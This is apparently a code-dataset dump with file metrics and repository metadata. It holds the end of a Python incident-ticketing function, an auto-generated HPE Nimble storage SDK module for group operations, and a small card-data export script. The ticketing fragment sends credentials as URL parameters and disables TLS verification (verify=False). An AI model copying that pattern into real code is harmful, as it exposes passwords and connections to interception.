"worklog.1.description" : "SECURITY ISSUE",
"worklog.1.DESCRIPTION_LONGDESCRIPTION" : "SECURITY ISSUE",
"INTERNALPRIORITY" : icd_priority,
"SITEID" : "APPOPINT", "CLASSIFICATIONID" : "SECURITY ISSUE",
"_lid" : icd_email,
"_lpwd" : icd_pass}
endpoint = "/rest/os/MXINCIDENT/"
base_url= icd_url + endpoint
response = requests.post(url=base_url, params=params, verify=False)
xmldata = bsoup(response.text,"html.parser")
icd_id = '{0}'.format(xmldata.createmxincidentresponse.mxincidentset.incident.ticketid)
icd_id = re.sub('[ticket<>/d]', '', icd_id)
yield StatusMessage("Completed successfully")
results = payload.done(success=True, content={
"incident_escalated" : incident_id,
"icd_id" : icd_id,
"details" : details_payload
})
# Produce a FunctionResult with the results
yield FunctionResult(results)
log.info("Complete")
except Exception:
yield FunctionError()
| 49.031008
| 191
| 0.591146
| 5,723
| 0.904822
| 5,172
| 0.817708
| 5,382
| 0.850909
| 0
| 0
| 1,931
| 0.305296
|
ce017638896c04f18c2cb7532f41f9850780cdae
| 28,484
|
py
|
Python
|
nimbleclient/v1/api/groups.py
|
prachiruparelia-hpe/nimble-python-sdk
|
a3e99d89e647291caf7936300ae853d21d94d6e5
|
[
"Apache-2.0"
] | 1
|
2020-05-28T19:48:59.000Z
|
2020-05-28T19:48:59.000Z
|
nimbleclient/v1/api/groups.py
|
prachiruparelia-hpe/nimble-python-sdk
|
a3e99d89e647291caf7936300ae853d21d94d6e5
|
[
"Apache-2.0"
] | null | null | null |
nimbleclient/v1/api/groups.py
|
prachiruparelia-hpe/nimble-python-sdk
|
a3e99d89e647291caf7936300ae853d21d94d6e5
|
[
"Apache-2.0"
] | null | null | null |
#
# © Copyright 2020 Hewlett Packard Enterprise Development LP
#
# This file was auto-generated by the Python SDK generator; DO NOT EDIT.
#
from ...resource import Resource, Collection
from ...exceptions import NimOSAPIOperationUnsupported
class Group(Resource):
"""Group is a collection of arrays operating together organized into storage pools.
# Parameters
id : Identifier of the group.
name : Name of the group.
smtp_server : Hostname or IP Address of SMTP Server.
smtp_port : Port number of SMTP Server.
smtp_auth_enabled : Whether SMTP Server requires authentication.
smtp_auth_username : Username to authenticate with SMTP Server.
smtp_auth_password : Password to authenticate with SMTP Server.
smtp_encrypt_type : Level of encryption for SMTP. Requires use of SMTP Authentication if encryption is enabled.
autosupport_enabled : Whether to send autosupport.
allow_analytics_gui : Specify whether to allow HPE Nimble Storage to use Google Analytics in the GUI. HPE Nimble Storage uses Google Analytics to gather
data related to GUI usage. The data gathered is used to evaluate and improve the product.
allow_support_tunnel : Whether to allow support tunnel.
proxy_server : Hostname or IP Address of HTTP Proxy Server. Setting this attribute to an empty string will unset all proxy settings.
proxy_port : Proxy Port of HTTP Proxy Server.
proxy_username : Username to authenticate with HTTP Proxy Server.
proxy_password : Password to authenticate with HTTP Proxy Server.
alert_to_email_addrs : Comma-separated list of email addresss to receive emails.
send_alert_to_support : Whether to send alert to Support.
alert_from_email_addr : From email address to use while sending emails.
alert_min_level : Minimum level of alert to be notified.
isns_enabled : Whether iSNS is enabled.
isns_server : Hostname or IP Address of iSNS Server.
isns_port : Port number for iSNS Server.
snmp_trap_enabled : Whether to enable SNMP traps.
snmp_trap_host : Hostname or IP Address to send SNMP traps.
snmp_trap_port : Port number of SNMP trap host.
snmp_get_enabled : Whether to accept SNMP get commands.
snmp_community : Community string to be used with SNMP.
snmp_get_port : Port number to which SNMP get requests should be sent.
snmp_sys_contact : Name of the SNMP administrator.
snmp_sys_location : Location of the group.
domain_name : Domain name for this group.
dns_servers : IP addresses for this group's dns servers.
ntp_server : Either IP address or hostname of the NTP server for this group.
timezone : Timezone in which this group is located.
user_inactivity_timeout : The amount of time in seconds that the user session is inactive before timing out.
syslogd_enabled : Is syslogd enabled on this system.
syslogd_server : Hostname of the syslogd server.
syslogd_port : Port number for syslogd server.
syslogd_servers : Hostname and/or port of the syslogd servers.
vvol_enabled : Are vvols enabled on this group.
iscsi_enabled : Whether iSCSI is enabled on this group.
fc_enabled : Whether FC is enabled on this group.
unique_name_enabled : Are new volume and volume collection names transformed on this group.
access_protocol_list : Protocol used to access this group.
group_target_enabled : Is group_target enabled on this group.
default_iscsi_target_scope : Newly created volumes are exported under iSCSI Group Target or iSCSI Volume Target.
tdz_enabled : Is Target Driven Zoning (TDZ) enabled on this group.
tdz_prefix : Target Driven Zoning (TDZ) prefix for peer zones created by TDZ.
group_target_name : Iscsi target name for this group.
default_volume_reserve : Amount of space to reserve for a volume as a percentage of volume size.
default_volume_warn_level : Default threshold for volume space usage as a percentage of volume size above which an alert is raised.
default_volume_limit : Default limit for a volume space usage as a percentage of volume size. Volume will be taken offline/made non-writable on exceeding its
limit.
default_snap_reserve : Amount of space to reserve for snapshots of a volume as a percentage of volume size.
default_snap_warn_level : Default threshold for snapshot space usage of a volume as a percentage of volume size above which an alert is raised.
default_snap_limit : This attribute is deprecated. The array does not limit a volume's snapshot space usage. The attribute is ignored on input and returns
max int64 value on output.
default_snap_limit_percent : This attribute is deprecated. The array does not limit a volume's snapshot space usage. The attribute is ignored on input and returns
-1 on output.
alarms_enabled : Whether alarm feature is enabled.
vss_validation_timeout : The amount of time in seconds to validate Microsoft VSS application synchronization before timing out.
auto_switchover_enabled : Whether automatic switchover of Group management services feature is enabled.
auto_switchover_messages : List of validation messages for automatic switchover of Group Management. This will be empty when there are no conflicts found.
merge_state : State of group merge.
merge_group_name : Group that we're being merged with.
tlsv1_enabled : Enable or disable TLSv1.0 and TLSv1.1.
cc_mode_enabled : Enable or disable Common Criteria mode.
group_snapshot_ttl : Snapshot Time-to-live(TTL) configured at group level for automatic deletion of unmanaged snapshots. Value 0 indicates unlimited TTL.
autoclean_unmanaged_snapshots_ttl_unit : Unit for unmanaged snapshot time to live.
autoclean_unmanaged_snapshots_enabled : Whether autoclean unmanaged snapshots feature is enabled.
leader_array_name : Name of the array where the group Management Service is running.
leader_array_serial : Serial number of the array where the group Management Service is running.
management_service_backup_array_name : Name of the array where backup the group Management Service is running.
management_service_backup_status : HA status of the group Management Service.
failover_mode : Failover mode of the group Management Service.
witness_status : Witness status from group Management Service array and group Management Service backup array.
member_list : Members of this group.
compressed_vol_usage_bytes : Compressed usage of volumes in the group.
compressed_snap_usage_bytes : Compressed usage of snapshots in the group.
uncompressed_vol_usage_bytes : Uncompressed usage of volumes in the group.
uncompressed_snap_usage_bytes : Uncompressed usage of snapshots in the group.
usable_capacity_bytes : Usable capacity bytes of the group.
usage : Used space of the group in bytes.
raw_capacity : Total capacity of the group.
usable_cache_capacity : Usable cache capacity of the group.
raw_cache_capacity : Total cache capacity of the group.
snap_usage_populated : Total snapshot usage as if each snapshot is deep copy of the volume.
pending_deletes : Usage for blocks that are not yet deleted.
num_connections : Number of connections to the group.
vol_compression_ratio : Compression ratio of volumes in the group.
snap_compression_ratio : Compression ratio of snapshots in the group.
compression_ratio : Compression savings for the group expressed as ratio.
dedupe_ratio : Dedupe savings for the group expressed as ratio.
clone_ratio : Clone savings for the group expressed as ratio.
vol_thin_provisioning_ratio : Thin provisioning savings for volumes in the group expressed as ratio.
savings_ratio : Overall savings in the group expressed as ratio.
data_reduction_ratio : Space savings in the group that does not include thin-provisioning savings expressed as ratio.
savings_dedupe : Space usage savings in the group due to deduplication.
savings_compression : Space usage savings in the group due to compression.
savings_clone : Space usage savings in the group due to cloning of volumes.
savings_vol_thin_provisioning : Space usage savings in the group due to thin provisioning of volumes.
savings_data_reduction : Space usage savings in the group that does not include thin-provisioning savings.
savings : Overall space usage savings in the group.
free_space : Free space of the pool in bytes.
unused_reserve_bytes : Reserved space that is not utilized.
usage_valid : Indicates whether the usage of group is valid.
space_info_valid : Is space info for this group valid.
version_current : Version of software running on the group.
version_target : Desired software version for the group.
version_rollback : Rollback software version for the group.
update_state : Group update state.
update_start_time : Start time of last update.
update_end_time : End time of last update.
update_array_names : Arrays in the group undergoing update.
update_progress_msg : Group update detailed progress message.
update_error_code : If the software update has failed, this indicates the error code corresponding to the failure.
update_downloading : Is software update package currently downloading.
update_download_error_code : If the software download has failed, this indicates the error code corresponding to the failure.
update_download_start_time : Start time of last update.
update_download_end_time : End time of last update.
iscsi_automatic_connection_method : Is iscsi reconnection automatic.
iscsi_connection_rebalancing : Does iscsi automatically rebalance connections.
repl_throttled_bandwidth : Current bandwidth throttle for replication, expressed either as megabits per second or as -1 to indicate that there is no throttle.
repl_throttled_bandwidth_kbps : Current bandwidth throttle for replication, expressed either as kilobits per second or as -1 to indicate that there is no throttle.
repl_throttle_list : All the replication bandwidth limits on the system.
volume_migration_status : Status of data migration activity related to volumes being relocated to different pools.
array_unassign_migration_status : Data migration status for arrays being removed from their pool.
data_rebalance_status : Status of data rebalancing operations for pools in the group.
scsi_vendor_id : SCSI vendor ID.
encryption_config : How encryption is configured for this group.
last_login : Time and user of last login to this group.
num_snaps : Number of snapshots in the group.
num_snapcolls : Number of snapshot collections in this group.
date : Unix epoch time local to the group.
login_banner_message : The message for the login banner that is displayed during user login activity.
login_banner_after_auth : Should the banner be displayed before the user credentials are prompted or after prompting the user credentials.
login_banner_reset : This will reset the banner to the version of the installed NOS. When login_banner_after_auth is specified, login_banner_reset can not
be set to true.
snap_retn_meter_high : Threshold for considering a volume as high retention.
snap_retn_meter_very_high : Threshold for considering a volume as very high retention.
"""
def reboot(self, **kwargs):
"""Reboot all arrays in the group.
# Parameters
id : ID of the group to reboot.
job_timeout: Job timeout in seconds.
"""
return self._collection.reboot(
self.id,
**kwargs
)
def halt(self, **kwargs):
"""Halt all arrays in the group.
# Parameters
id : ID of the group to halt.
force : Halt remaining arrays when one or more is unreachable.
job_timeout: Job timeout in seconds.
"""
return self._collection.halt(
self.id,
**kwargs
)
def test_alert(self, level, **kwargs):
"""Generate a test alert.
# Parameters
id : ID of the group.
level : Level of the test alert.
"""
return self._collection.test_alert(
self.id,
level,
**kwargs
)
def software_update_precheck(self, **kwargs):
"""Run software update precheck.
# Parameters
id : ID of the group.
skip_precheck_mask : Flag to allow skipping certain types of prechecks.
"""
return self._collection.software_update_precheck(
self.id,
**kwargs
)
def software_update_start(self, **kwargs):
"""Update the group software to the downloaded version.
# Parameters
id : ID of the group.
skip_start_check_mask : Flag to allow skipping certain types of checks.
"""
return self._collection.software_update_start(
self.id,
**kwargs
)
def software_download(self, version, **kwargs):
"""Download software update package.
# Parameters
id : ID of the group.
version : Version string to download.
force : Flag to force download.
"""
return self._collection.software_download(
self.id,
version,
**kwargs
)
def software_cancel_download(self, **kwargs):
"""Cancel ongoing download of software.
# Parameters
id : ID of the group.
"""
return self._collection.software_cancel_download(
self.id,
**kwargs
)
def software_update_resume(self, **kwargs):
"""Resume stopped software update.
# Parameters
id : ID of the group.
"""
return self._collection.software_update_resume(
self.id,
**kwargs
)
def get_group_discovered_list(self, **kwargs):
"""Get list of discovered groups with arrays that are initialized.
# Parameters
id : ID of the group.
group_name : Name of the group requested to be discovered.
"""
return self._collection.get_group_discovered_list(
self.id,
**kwargs
)
def validate_merge(self, src_group_ip, src_group_name, src_password, src_username, **kwargs):
"""Perform group merge validation.
# Parameters
id : ID of the group.
src_group_name : Name of the source group.
src_group_ip : IP address of the source group.
src_username : Username of the source group.
src_password : Password of the source group.
src_passphrase : Source group encryption passphrase.
skip_secondary_mgmt_ip : Skip check for secondary management IP address.
"""
return self._collection.validate_merge(
self.id,
src_group_ip,
src_group_name,
src_password,
src_username,
**kwargs
)
def merge(self, src_group_ip, src_group_name, src_password, src_username, **kwargs):
"""Perform group merge with the specified group.
# Parameters
id : ID of the group.
src_group_name : Name of the source group.
src_group_ip : IP address of the source group.
src_username : Username of the source group.
src_password : Password of the source group.
src_passphrase : Source group encryption passphrase.
force : Ignore warnings and forcibly merge specified group with this group.
skip_secondary_mgmt_ip : Skip check for secondary management IP address.
job_timeout : Job timeout in seconds.
"""
return self._collection.merge(
self.id,
src_group_ip,
src_group_name,
src_password,
src_username,
**kwargs
)
def get_eula(self, **kwargs):
"""Get URL to download EULA contents.
# Parameters
id : ID of the group.
locale : Locale of EULA contents. Default is en.
format : Format of EULA contents. Default is HTML.
phase : Phase of EULA contents. Default is setup.
force : Flag to force EULA.
"""
return self._collection.get_eula(
self.id,
**kwargs
)
def check_migrate(self, **kwargs):
"""Check if the group Management Service can be migrated to the group Management Service backup array.
# Parameters
id : ID of the group.
"""
return self._collection.check_migrate(
self.id,
**kwargs
)
def migrate(self, **kwargs):
"""Migrate the group Management Service to the current group Management Service backup array.
# Parameters
id : ID of the group.
"""
return self._collection.migrate(
self.id,
**kwargs
)
def get_timezone_list(self, **kwargs):
"""Get list of group timezones.
# Parameters
id : ID of the group.
"""
return self._collection.get_timezone_list(
self.id,
**kwargs
)
def create(self, **kwargs):
raise NimOSAPIOperationUnsupported("create operation not supported")
def delete(self, **kwargs):
raise NimOSAPIOperationUnsupported("delete operation not supported")
class GroupList(Collection):
resource = Group
resource_type = "groups"
def reboot(self, id, **kwargs):
"""Reboot all arrays in the group.
# Parameters
id : ID of the group to reboot.
job_timeout: Job timeout in seconds.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'reboot',
id=id,
**kwargs
)
def halt(self, id, **kwargs):
"""Halt all arrays in the group.
# Parameters
id : ID of the group to halt.
force : Halt remaining arrays when one or more is unreachable.
job_timeout: Job timeout in seconds.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'halt',
id=id,
**kwargs
)
def test_alert(self, id, level, **kwargs):
"""Generate a test alert.
# Parameters
id : ID of the group.
level : Level of the test alert.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'test_alert',
id=id,
level=level,
**kwargs
)
def software_update_precheck(self, id, **kwargs):
"""Run software update precheck.
# Parameters
id : ID of the group.
skip_precheck_mask : Flag to allow skipping certain types of prechecks.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'software_update_precheck',
id=id,
**kwargs
)
def software_update_start(self, id, **kwargs):
"""Update the group software to the downloaded version.
# Parameters
id : ID of the group.
skip_start_check_mask : Flag to allow skipping certain types of checks.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'software_update_start',
id=id,
**kwargs
)
def software_download(self, id, version, **kwargs):
"""Download software update package.
# Parameters
id : ID of the group.
version : Version string to download.
force : Flag to force download.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'software_download',
id=id,
version=version,
**kwargs
)
def software_cancel_download(self, id, **kwargs):
"""Cancel ongoing download of software.
# Parameters
id : ID of the group.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'software_cancel_download',
id=id,
**kwargs
)
def software_update_resume(self, id, **kwargs):
"""Resume stopped software update.
# Parameters
id : ID of the group.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'software_update_resume',
id=id,
**kwargs
)
def get_group_discovered_list(self, id, **kwargs):
"""Get list of discovered groups with arrays that are initialized.
# Parameters
id : ID of the group.
group_name : Name of the group requested to be discovered.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'get_group_discovered_list',
id=id,
**kwargs
)
def validate_merge(self, id, src_group_ip, src_group_name, src_password, src_username, **kwargs):
"""Perform group merge validation.
# Parameters
id : ID of the group.
src_group_name : Name of the source group.
src_group_ip : IP address of the source group.
src_username : Username of the source group.
src_password : Password of the source group.
src_passphrase : Source group encryption passphrase.
skip_secondary_mgmt_ip : Skip check for secondary management IP address.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'validate_merge',
id=id,
src_group_ip=src_group_ip,
src_group_name=src_group_name,
src_password=src_password,
src_username=src_username,
**kwargs
)
def merge(self, id, src_group_ip, src_group_name, src_password, src_username, **kwargs):
"""Perform group merge with the specified group.
# Parameters
id : ID of the group.
src_group_name : Name of the source group.
src_group_ip : IP address of the source group.
src_username : Username of the source group.
src_password : Password of the source group.
src_passphrase : Source group encryption passphrase.
force : Ignore warnings and forcibly merge specified group with this group.
skip_secondary_mgmt_ip : Skip check for secondary management IP address.
job_timeout : Job timeout in seconds.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'merge',
id=id,
src_group_ip=src_group_ip,
src_group_name=src_group_name,
src_password=src_password,
src_username=src_username,
**kwargs
)
def get_eula(self, id, **kwargs):
"""Get URL to download EULA contents.
# Parameters
id : ID of the group.
locale : Locale of EULA contents. Default is en.
format : Format of EULA contents. Default is HTML.
phase : Phase of EULA contents. Default is setup.
force : Flag to force EULA.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'get_eula',
id=id,
**kwargs
)
def check_migrate(self, id, **kwargs):
"""Check if the group Management Service can be migrated to the group Management Service backup array.
# Parameters
id : ID of the group.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'check_migrate',
id=id,
**kwargs
)
def migrate(self, id, **kwargs):
"""Migrate the group Management Service to the current group Management Service backup array.
# Parameters
id : ID of the group.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'migrate',
id=id,
**kwargs
)
def get_timezone_list(self, id, **kwargs):
"""Get list of group timezones.
# Parameters
id : ID of the group.
"""
return self._client.perform_resource_action(
self.resource_type,
id,
'get_timezone_list',
id=id,
**kwargs
)
def create(self, **kwargs):
raise NimOSAPIOperationUnsupported("create operation not supported")
def delete(self, **kwargs):
raise NimOSAPIOperationUnsupported("delete operation not supported")
| 44.5759
| 179
| 0.584082
| 28,232
| 0.991118
| 0
| 0
| 0
| 0
| 0
| 0
| 21,502
| 0.754853
|
ce02069f82a4f0531c7597c44775348bc1d10f18
| 309
|
py
|
Python
|
sdk_client/scripts/cards2json.py
|
victorlacorte/MTG-SDK-Client
|
33fdbfbf545e9f3961369b123a2f7fe783ce8f12
|
[
"DOC"
] | null | null | null |
sdk_client/scripts/cards2json.py
|
victorlacorte/MTG-SDK-Client
|
33fdbfbf545e9f3961369b123a2f7fe783ce8f12
|
[
"DOC"
] | null | null | null |
sdk_client/scripts/cards2json.py
|
victorlacorte/MTG-SDK-Client
|
33fdbfbf545e9f3961369b123a2f7fe783ce8f12
|
[
"DOC"
] | null | null | null |
import json
import mtgsdk as mtg
magic_sets = ('grn',)
def main():
for s in magic_sets:
cards = [vars(c) for c in mtg.Card.where(set=s).all()]
with open(f'tests/data/{s}.json', 'w') as f:
json.dump(cards, f, indent=4, sort_keys=True)
if __name__ == '__main__':
main()
| 19.3125
| 62
| 0.585761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 40
| 0.12945
|